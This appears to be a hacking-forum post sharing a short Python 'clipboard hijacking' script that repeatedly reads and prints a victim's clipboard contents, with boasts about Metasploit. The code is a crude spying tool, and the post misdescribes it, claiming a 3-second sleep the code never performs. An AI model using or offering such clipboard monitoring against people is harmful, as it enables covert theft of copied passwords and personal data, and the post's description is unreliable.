Sign in to follow this  
mesvak

(takemetochurch) CLIPBOARDHIJACKING WRITTINE IN PY

Recommended Posts

[hide]

 

#Power BY mesvak 
#pip install pyperclip

import pyperclip
import time

list = []  
while True: 
   
   if pyperclip.paste() != 'None':    
       value = pyperclip.paste()      
      
       if value not in list:   
                               
           list.append(value)
           
       print list
       

 

 

 

[/hide]

 

AS you can see it will appear all the paperclip of zombie or the victim on ur monitor or will show u and display it  this is so simple i m using Metasploit for this one cuase its prepared and have one script written in ruby which is more powerfull and gud 

 

 

One thing to mention as u see there is sleep 3 sec so after 3 sec if the victim copy something new u will get that as well take me to the church m8

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this